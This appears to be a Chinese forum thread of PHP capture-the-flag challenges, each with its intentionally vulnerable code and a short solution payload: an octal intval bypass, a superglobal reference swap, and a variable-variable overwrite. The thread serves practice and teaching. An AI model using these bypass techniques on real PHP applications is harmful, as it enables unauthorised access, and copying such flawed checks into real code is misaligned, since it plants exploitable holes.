level 7
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(preg_match("/[a-z]/i", $num)){
die("no no no!");
}
if(intval($num,0)==4476){
echo $flag;
}else{
echo intval($num,0);
}
}
2022年06月19日 13点06分
2
?num=010574
2022年06月19日 13点06分
intval($num,0); 第二个参数为0的时候自动识别,0开头识别位8进制
2022年06月19日 13点06分
level 7
<?include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__); ?>
2022年06月22日 13点06分
3
?a 再post HTTP_FLAG=flag
2022年06月22日 13点06分
level 7
<meta charset="utf-8">
<?php
highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}
$$key=$$value; #
}foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}
$$key=$$value;
}
if(!($_POST['flag']==$flag)){
die($error);
}
echo "your are good".$flag."\n"; #
die($suces);
2022年06月22日 14点06分
4
get:?a=flag post:error=a&flag=b
2022年06月22日 14点06分